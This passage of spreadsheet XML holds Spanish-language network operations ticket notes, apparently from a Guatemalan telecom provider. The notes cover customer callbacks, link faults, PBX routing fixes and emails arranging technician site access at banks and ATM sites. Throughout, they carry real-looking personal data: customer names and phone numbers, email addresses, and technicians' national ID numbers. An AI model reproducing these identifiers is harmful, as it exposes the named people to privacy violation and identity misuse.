    <t>**SE LLAMA A CLIENTE ABIMAEL GUTIERREZ AL 42122724 / 34340380 NO RESPONDE EN NINGUN NUMERO ||
SE INTENTARA LUEGO **
-ID 3001703397 - 3001703494
**</t>
  </si>
  <si>
    <t>F4604499</t>
  </si>
  <si>
    <t>SE HABLÓ CON JAIRO VELÁSQUEZ/CLIENTE 46051665 INDICA QUE HOY NO ESTUVO EN ESTA SEDE; NO PUEDE VALIDAR LO DE LA ENERGÍA ELÉCTRICA; PIDE SE LE LLAME MAÑANA A LAS 08:00AM PARA SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4604500</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CESAR DEONICIO AL 30167645 SOLICITA QUE SE LE LLAME EN 10 MIN NUEVAMENTE YA QUE REALIZARA PRUEBAS **
-ID 3001653484
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CESAR DEONICIO 30167645 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001657150</t>
  </si>
  <si>
    <t>F4604502</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR CHANG  56990174 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001655295</t>
  </si>
  <si>
    <t>F4604503</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE KERIN SANDOVAL 59459804 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001656059</t>
  </si>
  <si>
    <t>F4604506</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KENETH TEJADA 42271739 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 8:30
-ID 3001659402</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KENETH TEJADA 42271739 INDICA QUE EL VE EL SERVICIO UP PERO ESTA LENTO SE CONSULTA CON GESTOR Y SOLICITA QUE SE LE PIDA LA IP LAN 172.19.30.2 Y BRINDA LOS DATOS ID 758500350 - TELEFONO 50258258368 - WAN 10.254.9.19 SE LE SOLICITA QUE REINICIE EL ROUTER PARA VALIDAR SI MEJORA INDICA QUE REALIZARA PRUEBAS DESPUES DEL REINICIO || SE DEVOLVERA LA LLAMADA LUEGO**
-ID 3001659402
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PARA VALIDAR TEMA DE ENERGIA --
NO RESPONDE--- SE LLAMADA EN DOS OCASIONES--</t>
  </si>
  <si>
    <t>PR FUERA DE HORARIO LABORAL, SE DARÁ SEGUIMIENTO MAÑANA A LAS 08:30AM A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>F4604508</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE HUGO MORALES 52650069 QUIEN COMENTA QUE  ES MUY COMPLICADO HACER PRUEBAS HOY YA QUE NO ESTA EN OFICINA Y NECESITA CONFIGURAR  LAS EXTENSIONES, ADEMAS VE COMPLICADO CONTACTAR AL PROVEEDOR DE MEXICO EL DIA DE HOY. SOLICITA SE LE CONTACTE EL LUNES 20/06 A LAS 10 HORAS. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CLIENTE HARÁ SUS PRUEBAS INTERNAS, SE DARÁ SEGUIMIENTO A LAS 13:00 HORAS.</t>
  </si>
  <si>
    <t>LLAMADA HACIA EL 24256565 DEBE CAER EN LA QUE LLAMAREMOS PBX #2 DEL CLIENTE, PERO CUANDO LA LLAMADA ENTRA POR EL PUERTO 4 DEL TELETECHNO  SUENA EN UNA LINEA QUE ESTA EN LA PBX NO.1  QUE TIENE EL CLIENTE, A NIVEL DE TRAZAS SE ENTREGA LA NUMERACIÓN CORRECTA AL CLIENTE Y A NIVEL DE REGLAS NO HAY PROBLEMAS PORQUE SE ENTRENGAN POR DONDE SE ESTA INDICANDO. SE CAMBIA SOLO EL RANGO DEL 242565XX A QUE SOLO SE ENTREGUE POR EL PUERTO 10  Y CON ESO YA LLEGA A LA EXTENCIÓN QUE EL CLIENTE NECESITA. PERO TANTO EL E1 4 COMO EL E1 10 VAN HACIA LA PBX #2, POR LO QUE A NIVEL INTERNO EL CLIENTE DEBE TENER ALGUNA CONFIGURACIÓN EN EL E1 4 QUE ENVIA LAS LLAMADAS HACIA  LA PBX #1, CLIENTE INDICA QUE REALIZARÁ PRUEBAS CON SUS LLAMADAS INTERNACIONALES EL DIA DE MAÑANA  Y QUE SE LE CONTACTE A LAS 10 HORAS.
RESULTADO: LLAMADA HECHA
NOMBRE: 52650069
NÚMERO: 52650069
INICIO: HOY, 18:35
FIN: HOY, 18:37
DURACIÓN: 2:25
ID DE LLAMADA: 1001758453</t>
  </si>
  <si>
    <t>** HUGO MORALES 52650069 (CLIENTE) INFORMA QUE AUN REALIZA PRUEBAS, COMENTA QUE CAMBIARÁ LA CENTRAL DE SUS E1S , SOLICITA SE LE LLAME A LAS 19:00 HRS -*
-*</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, NO HAY RESTRICCIONES EN LLAMADAS INTERNACIONALES; CLIENTE PIDE SE CONTINÚE SEGUIMIENTO MAÑANA A LAS 09:00AM</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE HUGO MORALES PERO NO CONTESTA.
3001676591, 3001676649, 3001676662.
COLA:
NOMBRE: A: 52650069
NÚMERO: 52650069
DURACIÓN: 0:00:12
ESTADO: MARCANDO
DETALLES: 52650069
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/06/2022 19:15:53</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE HUGO MORALES QUIEN INDICA QUE NO TIENE RESPUESTA POR PARTE DE MX. SOLICITA LLAMADA EL DIA DE MAÑANA A LAS 9:00AM
3001677200
COLA:
NOMBRE: A: 52650069
NÚMERO: 52650069
DURACIÓN: 0:00:57
ESTADO: CONECTADA
DETALLES: 52650069
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/06/2022 19:25:29</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HUGO MORALES 52650069 MENCIONA QUE PERSISTE EL INCONVENIENTE, SI PUEDEN SACAR LLAMADAS PERO NO RECIBEN LLAMADAS INTERNACIONALES
SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001713084</t>
  </si>
  <si>
    <t>F4604516</t>
  </si>
  <si>
    <t>###SE COLOCA COLA DE CORREOS PARA GESTIONAR PERMISOS ###
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 7:37
PARA: NOC CORPORATIVO &lt;NOC@REDOPTIMA.NET&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC-CALLCENTER@BANRURAL.COM.G &lt;TIC-CALLCENTER@BANRURAL.COM.G&gt;; TIC-CALLCENTER@BANRURAL.COM.GT &lt;TIC-CALLCENTER@BANRURAL.COM.GT&gt;; TIC-TELE-TEC@BANRURAL.COM.GT &lt;TIC-TELE-TEC@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 8902629T |BANCO DE DESARROLLO RURAL, S.A. | INTERNET_1 AVENIDA DEL CHAJON NO.26 LA ANTIGUA SACATEPEQUEZ
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 8902629T |BANCO DE DESARROLLO RURAL, S.A.   | INTERNET_1 AVENIDA DEL CHAJON NO.26 LA ANTIGUA SACATEPEQUEZ
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
JOSE RAFAEL AQUINO PEREZ                    1607 60097 0301
WALTER JOSE OLIVA ROMAN                    2778 53699 0406
DAVID FLORENCIO ROMERO BENITO      2619 94115 0301
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>###SE RECIBE RESPUESTA DEL CLIETNTE YA AUTORIZADOS LOS PERMISOS##
DE: AGE FIGUEROA, WALTER ESTUARDO &lt;ESTUARDO.FIGUEROA@BANRURAL.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 11:06
PARA: NOC CORPORATIVO &lt;NOC@REDOPTIMA.NET&gt;; VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC-CALLCENTER@BANRURAL.COM.G &lt;TIC-CALLCENTER@BANRURAL.COM.G&gt;; TIC-CALLCENTER@BANRURAL.COM.GT &lt;TIC-CALLCENTER@BANRURAL.COM.GT&gt;; TIC-TELE-TEC@BANRURAL.COM.GT &lt;TIC-TELE-TEC@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; AGE CASTANEDA, DAVID &lt;DAVID.CASTANEDA@BANRURAL.COM.GT&gt;; AGE LOPEZ, JOAQUIN &lt;JOAQUIN.LOPEZ@BANRURAL.COM.GT&gt;; AGE RODRIGUEZ, EMILDA &lt;EMILDA.RODRIGUEZ@BANRURAL.COM.GT&gt;; AGE001 - ANTIGUA &lt;AGE001@BANRURAL.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: GESTIÓN DE PERMISOS | 8902629T |BANCO DE DESARROLLO RURAL, S.A. | INTERNET_1 AVENIDA DEL CHAJON NO.26 LA ANTIGUA SACATEPEQUEZ
AUTORIZADO, APOYARME CON EL INGRESO DEL PERSONAL DESCRITO ESTIMADA  GERENTE DE AGENCIA @AGE001 - ANTIGUA
SALUDOS,</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARMEN ISABEL VASQUEZ 25041501 EXT 000111 PERO NO RESPONDEN
-ID 3001661692</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A CARMEN VÁSQUEZ/PR 52048968 PARA SEGUIMIENTO; ME COMUNICA CON SAÚL SÁNCHEZ/SUBGERENTE, ÉSTE INDICA QUE ESTÁ DOWN SERVICIO. SE PIDE APOYO A CNOC CLARO VÍA SKYPE, VÍA TELÉFONO APOYA SAMUEL ESTRADA/GESTOR, EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARMEN ISABEL VASQUEZ 25041501 EXT 000111 PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 3001646817 - 3001647103</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON FRANCISCO GONZÁLEZ/CLIENTE 23742016 INDICA QUE TAMPOCO HAN TENIDO RESPUESTA DE LOS PERMISOS, PIDE SE HABLE CON WALTER ESTUARDO FIGUEROA CLIENTE 59790000, SE HABLÓ CON ÉSTE, INDICA QUE NOS APOYARÁ CONTESTANDO CORREO</t>
  </si>
  <si>
    <t>F4604517</t>
  </si>
  <si>
    <t>SE HACE LLAMADA DE PRUEBA A GDN 23832100 ENTRA LA MISMA, CONTESTA MARÍA ANDRÉ JHON, INDICA QUE TODO OK, SE LE PIDE CIERRE DEL TICKET, LO AUTORIZA.</t>
  </si>
  <si>
    <t>SE COORDINA VISITA TÉCNICA A CLIENTE PARA MAÑANA A LAS 08:30AM, SE CERTIFICARÁ SERVICIO A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE MARIA YON QUIEN INDICA QUE EN EL EQUIPO DE CLARO LA LUZ DE  PMA SE APAGA Y SE ENCIENDE.
EL DIA DE HOY SE RETIRA A LAS 17:00HRS. SOLICITA UNA VISITA TECNICA PARA EL DIA DE MAÑANA A LAS 8:30AM
PARA CERTIFICACION DEL SERVICIO.
3001642695
COLA:
NOMBRE: A: 30182930
NÚMERO: 011 50230182930
DURACIÓN: 0:00:18
ESTADO: CONECTADA
DETALLES: +50230182930
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 16/06/2022 16:23:33</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE MARÍA ANDRE YON, QUIEN INDICA QUE LAS LLAMADAS SE ESTAN CORTANDO.</t>
  </si>
  <si>
    <t>F4604522</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE  OSCAR CARDONA AL 33717765 CONFIRMA SERVICIO ESTABLE POR EL MOMENTO PERO CLIENTE SOLICITA HABLAR CON GESTOR PARA QUE LE EXPLIQUEN QUE SE LE TRABAJO SI SE LE HIZO LA ACTIVACION DE ALGO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
-ID 3001690751 - 3001691093
**</t>
  </si>
  <si>
    <t>F4604544</t>
  </si>
  <si>
    <t>SE LLAMA A CELITNE DANIELA NAJARRO-62061237  E INDICA QUE YA TODO ESTA BIEN, COMENTA QUE TUVO PROBLEMAS DE ENERGIA- SELE SUGIERE VERIFICAR EQUIPOS EN SUS INSTLAACIOENS Y QUE LE BRINDEN MANTENIMIENTO A QUEIPOS DE ENERGIA##QUEDA ENTERADA##VIVO</t>
  </si>
  <si>
    <t>F4604550</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR TECUN 37610279 MENCIONA QUE YA ESTAN GESTIONADOS LOS PERMISOS, CLIENTE INFORMA QUE PUEDEN ESPERAR HASTA LAS 16:30 EN PR
CONTACTO EN SITIO: LUIS PAREDES - 41280052
-ID 3001782106</t>
  </si>
  <si>
    <t>SE CONFIRMA CON CLIENTE EL CONTACTO DE LA PERSONA EN PR LUIS PAREDES - 41280052
-ID 3001732040</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 12:02
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; LUIS A. PAREDES (ATI DE TELECOMUNICACIONES Y SEGURIDAD TI) &lt;LUIS_PAREDESF@BANTRAB.NET.GT&gt;; VICTOR TECUN (ATI DE TELECOMUNICACIONES Y SEGURIDAD TI) &lt;VICTOR_TECUN@BANTRAB.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;; REDES Y SEGURIDAD TI &lt;REDESYSEGURIDADTI@BANTRAB.NET.GT&gt;
ASUNTO: RE: VISITA TÉCNICA ID: 42700518T || BANCO DE LOS TRABAJADORES || AVENIDA LA REFORMA 7-08 ZONA 9
BUENA TARDE
  EN SEGUIMIENTO AL TICKET CONFIRMA PERSONAL TÉCNICO QUE SE TIENE UN DAÑO EN LA FIBRA ÓPTICA A 57 METROS EN EL EDIFICIO POR LO QUE ES NECESARIO GESTIONAR LOS PERMISOS CON LA ADMINISTRACIÓN Y PODER REALIZAR LAS REPARACIONES NECESARIAS.
MYNOR JOEL HERNANDEZ DPI 1895349150101
FLORENCIO MIGUEL ANGEL LIMA DPI 2371923570101
AMILCAR ALEXANDER BOBADILLA DPI 23087119401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Ó A CLIENTE 37610279 PARA SEGUIMIENTO, NO CONTESTA; SE CORRIGE LA DIRECCIÓN DE CORREO, Y SE LE PIDE APOYO POR LA MISMA VÍA:
ASUNTO: VISITA TÉCNICA ID: 42700518T || BANCO DE LOS TRABAJADORES || AVENIDA LA REFORMA 7-08 ZONA 9</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR TECUN  37610279 MENCIONA QUE SE ENCUENTRA EN REUNION POR LO QUE SOLICITA LLAMDA EN 15 MIN
-ID 3001663551</t>
  </si>
  <si>
    <t>|| SE ENVIA DATOS DE TECNICOS A CLIENTE PENDIENTE QUE CONFIRMEN ACCESOS || VISITA PARA MAÑANA 9:00 HRS // SERVICIO DOWN SIN LINK DE FO // 23 MINUTOS ACUMULADOS EN WO
ASUNTO: VISITA TÉCNICA ID: 42700518T || BANCO DE LOS TRABAJADORES || AVENIDA LA REFORMA 7-08 ZONA 9
ERITO FERNANDO TECU XITUMUL
BUENA NOCHE VICTOR.
EN SEGUIMIENTO AL SERVICIO ID: 42700518T || BANCO DE LOS TRABAJADORES || AVENIDA LA REFORMA 7-08 ZONA 9 CIUDAD DE GUATEMALA.
TE COMENTO SE ESTÁ COORDINANDO UNA VISITA TÉCNICA PARA EL DÍA DE MAÑANA VIERNES 17/06 A PARTIR DE LAS 9:00 HRS, SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR LOS ACCESOS PARA EL PERSONAL TÉCNICO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR TECUN  37610279 PARA SOLICITAR LOS DATOS DE VISITA
-ID 3001667415
NOMBRE DEL CLIENTE: BANCO DE LOS TRABAJADORES
UBICACIÓN:AVENIDA LA REFORMA 7-08 ZONA 9
CONTACTO EN SITIO: LUIS PAREDES
HORARIO DE ATENCION:CLIENTE SOLICITA VISITA PARA MAÑANA A LAS 9:00
GESTIÓN DE PERMISOS:DATOS DE PERSONAL TECNICO  VICOR_TECUN@BANTRAB.COM</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  VICTOR TECUN 37610279 MENCIONA QUE VA NOTIFICAR CON PERSONAL DE PR PARA LOCALIZAR A TECNICO
-ID 3001729292</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  VICTOR TECUN 37610279 MENCIONA QUE YA ESTAN AUTORIZADOS LOS PERMISOS PARA LA VISITA
-ID 3001727450</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 9:47
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; VICTOR TECUN (ATI DE TELECOMUNICACIONES Y SEGURIDAD TI) &lt;VICTOR_TECUN@BANTRAB.COM&gt;; LUIS A. PAREDES (ATI DE TELECOMUNICACIONES Y SEGURIDAD TI) &lt;LUIS_PAREDESF@BANTRAB.NET.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;; REDES Y SEGURIDAD TI &lt;REDESYSEGURIDADTI@BANTRAB.NET.GT&gt;
ASUNTO: RE: VISITA TÉCNICA ID: 42700518T || BANCO DE LOS TRABAJADORES || AVENIDA LA REFORMA 7-08 ZONA 9
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
JAVIER DANILO CHETE CHAJON               2149 40594 0103 532967
ERWIN EDUARDO DEL CID DUBON        1981 48798 0101 52522
HECTOR MISAEL RAMIREZ CARDONA    710195 2249 23862 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604554</t>
  </si>
  <si>
    <t>###SE ENVIA EL CORREO PARA COORDINAR LA VISITA PARA MAÑANA A LAS 9 AM, DEBIDO A LAS 3 HORAS QUE ESTA EL TECNICO DEL LUGAR Y PROBLEMAS EN CARRETERAS###
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 13:25
PARA: MONITOREO FALLAS ATMS &lt;OPERADORES.ATM4@TAV.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; EPALENCIA@5B.COM.GT &lt;EPALENCIA@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; SUPERVISORES OSI &lt;SUPERVISORES_OSI@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: GESTIÓN DE PERMISOS | 47503341T |TRANSACCIONES Y TRANSFERENCIAS | 50251226640_BAM SANTA CATALINA LA TINTA_CAJERO 4179_BAM SANTA CATALINA LA TINTA_CALLE DEL CEMENTERIO
MUY BUENAS TARDES ESTIMADOS.
QUERÍAMOS PODER SOLICITARLES SU APOYO PARA COORDINAR LA VISITA PARA EL DÍA DE MAÑANA 18/06/2022 A LAS 9 AM. DEBIDO A QUE PERSONAL TÉCNICO SE ENCUENTRA AÚN A 3 HORAS DEL LUGAR Y TIENEN PROBLEMAS EN CARRETERA POR LAS LLUVIAS. MUCHAS GRACIAS DE ANTEMANO POR EL APOYO.
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 9:26
PARA: MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; SERVICIOS5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;; SUPERVISORES OSI &lt;SUPERVISORES_OSI@5B.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 47503341T |TRANSACCIONES Y TRANSFERENCIAS | 50251226640_BAM SANTA CATALINA LA TINTA_CAJERO 4179_BAM SANTA CATALINA LA TINTA_CALLE DEL CEMENTERIO
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 47503341T |TRANSACCIONES Y TRANSFERENCIAS   | 50251226640_BAM SANTA CATALINA LA TINTA_CAJERO 4179_BAM SANTA CATALINA LA TINTA_CALLE DEL CEMENTERIO
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
               NOMBRE                                    IBM                  DPI
 RICO LOPEZ  WILDER ARNOLDO        718081          2680948611601
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL QUIEN SOLICITA SE ENVIE LA INFORMACION POR CORREO Y ENVIAR LA NUEVA FECHA Y HORA PARA REALIZAR LAS VISITA
-ID 3001786</t>
  </si>
  <si>
    <t>COORDINADA LA VISITA TÉCNICA PARA LAS 13:00 HORAS, CLIENTE/OPERACIONES REGIÓN ENTERADOS.</t>
  </si>
  <si>
    <t>CORRIGIENDO LO DICHO EN CRONO ANTERIOR, COORDINADA LA VISTA TÉCNICA PARA MAÑANA A LAS 09:00AM ENTRE CNOC CLARO/CLIENTE:
DE: MONITOREO FALLAS ATMS [MAILTO:OPERADORES.ATM4@TAV.COM.GT]
ENVIADO EL: VIERNES, 17 DE JUNIO DE 2022 13:33
ASUNTO: RE: GESTIÓN DE PERMISOS | 47503341T |TRANSACCIONES Y TRANSFERENCIAS | 50251226640_BAM SANTA CATALINA LA TINTA_CAJERO 4179_BAM SANTA CATALINA LA TINTA_CALLE DEL CEMENTERIO
BUEN DÍA
ENTERADO, QUEDAMOS PARA MAÑANA  A LAS 09:00.</t>
  </si>
  <si>
    <t>F4604560</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A FRANCISCO ROSALES 52032621 PERO NO SE TIENE RESPUESTA
3001811033
COLA:
NOMBRE: A: 52032621
NÚMERO: 55280199
DURACIÓN: 0:00:44
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 17/06/2022 14:14:11</t>
  </si>
  <si>
    <t>F4604564</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 15:19
PARA: LUIS ORTIZ &lt;LORTIZ@OMNISPORT.COM&gt;; 'JOSE SANTOS VELASQUEZ CASTRO' &lt;JVELASQUEZ@OMNISPORT.COM&gt;; LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; ALBERTO LENIN CESPEDES GONZALEZ &lt;ALBERTO.CESPEDE@CLARO.COM.NI&gt;; CNOC.CLARONI &lt;CNOC.CLARONI@CLARO.COM.NI&gt;; NOCDATOS &lt;NOCDATOS@CLARO.COM.NI&gt;
CC: 'SERVICE DESK' &lt;SERVICE-DESK@OMNISPORT.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: [EMAIL EXTERNO] RE: REVISION DE ENLACE IP5211920
BUENA TARDE
    EN SEGUIMIENTO AL TICKET SE HA INTENTADO CONTACTAR EN REPETIDAS OCASIONES AL NUMERO 22725166 PERO INDICA QUE ESTA PENDIENTE DE INSTALACION Y EL NUMERO 88419873 RESPONDE CABALLERO INDICANDO QUE ES NÚMERO EQUIVOCADO.
SOLICITAMOS DE SU APOYO EN COMPARTIR ALGÚN CONTACTO (NOMBRE Y NÚMERO) DE PUNTO REMOTO PARA PODER REALIZAR LAS PRUEBAS DE PRIMER NIVEL.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL  00505  22725166 ||  OPERADORA DA TONO  QUE ESTA PENDIENTE DE INSTALACION A ESPERA QUE CL RESPONDA CORREO **
-ID 300169222
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL NUMERO 88419873  CONTESTA UN SEÑOR E INDICA QUE ES NUMERO EQUIVOCADO **
-ID 3001715418
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 88419873 MENCIONA QUE ES NUMERO EQUIVOCADO
-ID 3001827761</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL NUMERO 88419873. NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001699539
**</t>
  </si>
  <si>
    <t>SE RESPONDE CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 15:56
PARA: ELI URIAS &lt;EURIAS@OMNISPORT.COM&gt;; LUIS ORTIZ &lt;LORTIZ@OMNISPORT.COM&gt;; 'JOSE SANTOS VELASQUEZ CASTRO' &lt;JVELASQUEZ@OMNISPORT.COM&gt;; LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; ALBERTO LENIN CESPEDES GONZALEZ &lt;ALBERTO.CESPEDE@CLARO.COM.NI&gt;; CNOC.CLARONI &lt;CNOC.CLARONI@CLARO.COM.NI&gt;; NOCDATOS &lt;NOCDATOS@CLARO.COM.NI&gt;
CC: 'SERVICE DESK' &lt;SERVICE-DESK@OMNISPORT.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: [EMAIL EXTERNO] RE: REVISION DE ENLACE IP5211920
BUENA TARDE
     GRACIAS POR LA INFORMACIÓN, PERSONAL ENCARGADO ESTA REALIZANDO LAS PRUEBAS CON PERSONAL EN PUNTO REMOTO.
AL CONTAR CON AVANCES SE LE ESTARÁN BRINDANDO.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA AL NUMERO 27725166 RESPONDE FANI SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001838660</t>
  </si>
  <si>
    <t>SE LLAMA AL CONTACTO DE PR 2272-5166 CLIENTE NO RESPONDE || NUMERO DESCONECTADO || SE INTENTARA LUEGO **
ID 3001837137 - 3001837347
**</t>
  </si>
  <si>
    <t>**SE LLAMA AL CONTACTO DE PR 2272-5166 INDICA OPERADORA NUMERO PENDIENTE DE INSTALACION
ID 3001741824
**</t>
  </si>
  <si>
